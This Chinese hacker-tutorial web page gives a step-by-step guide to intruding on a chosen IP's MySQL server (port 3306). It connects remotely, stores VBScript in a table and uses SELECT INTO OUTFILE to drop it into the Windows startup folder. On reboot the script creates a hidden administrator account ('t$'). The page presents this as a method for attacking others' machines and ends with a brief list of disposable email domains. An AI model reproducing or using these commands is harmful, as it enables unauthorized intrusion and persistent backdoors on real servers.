幽灵学院 - 菜鸟起航从这里开始!

幽灵学院 - 中国最权威的网络安全门户网站!

当前位置: > 黑客教程 > 攻击入侵 >

指定IP入侵mysql 3306手动提权教程

软件类型:国产软件 授权方式:共享软件 界面语言:简体中文 软件大小:5.99 MB 运行环境:WinXP,Win7,Win8,Win2008 软件等级:★★★☆☆ 发布时间:2014-08-13
下载地址
软件介绍


1.确定要入侵的IP。我去找找   我整理下  去过滤一下3389  有点卡  我先暂停  我过滤好再开始 这些都是开3389
 
的    好了  现在开始吧   忘了说下  首先你们要装下PHP套件  有绿色版的  phpnow 百度一下  晕  整理前忘记
 
记起来帐号密码了  那今天我就说思路   我懒得去翻了   随便用一个   不开3389无所谓了 连上了  
 
2.连接到mysql数据库  mysql -u 用户名 -h ip -p 
 
3.查看服务器中有哪些数据库 show databases;  纯在test  
 
4.切换数据库  use test
 
5.查看数据库中的表 show tables;  看到 没有任何的表   我来插入个a
 
6.在 test 数据库中创建一个新的表:create table a (cmd text)  shi OKd   
 
 
7.在表中插入内容: 
insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); 
insert into a values ("a=wshshell.run (""cmd.exe /c net user t$ t /add"",0) " );  创建用户名为t$ 密码t
insert into a values ("a=wshshell.run (""cmd.exe /c net localgroup administrators t$ /add"",0) " ); 
提升管理员的   相信大家都懂
 
好了  都OK了  现在把它导出一个vbs脚本  
8.将表中的信息输出到位于启动项中的一个 vbs\文件内: 
select * from a into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启 动\\a.vbs"; 
这样就行了   只要他重启机器   你的账户就自动创建了    
 
9.等待远程主机重启
 
最后要说下   大家可以去过滤一下3389开放的机器      下次再出一个不用等待重启直接反弹shell的教程
 
现在有点事   就先这样了   希望大家懂哇  。。。。




本次给大家带来的教程是:邮箱 修改超级短QQ显示账号


需要用到的网站

邮箱尾戳的格式
@grr.la
@sharklasers.com
@guerillamail.biz
@auerrillamail.com
@guerrillamail.de
@guerrillamail.net
@guerrillamail.org
@guerrillamaiblock.com
@spam4.me


教程就是这么简单   谢谢大家的支持
                                             不喜勿喷哦

下载说明

?所有软件及教程内广告与本站无关、均为作者发布、切勿轻信、以免遭受损失!
?推荐使用第三方专业下载工具下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
?如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
?下载本站资源,如果服务器暂不能下载请过一段时间重试!
?如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
?本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。

本站统一解压缩密码为:www.41443.com

本站所有教程、软件请自行查后门。
 

顶一下
(5)
71.4%
踩一下
(2)
28.6%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
用户名: 验证码: 点击我更换图片
栏目列表
关闭
1700055555@qq.com 工作日:9:00-21:00
周 六:9:00-18:00
  扫一扫关注幽灵学院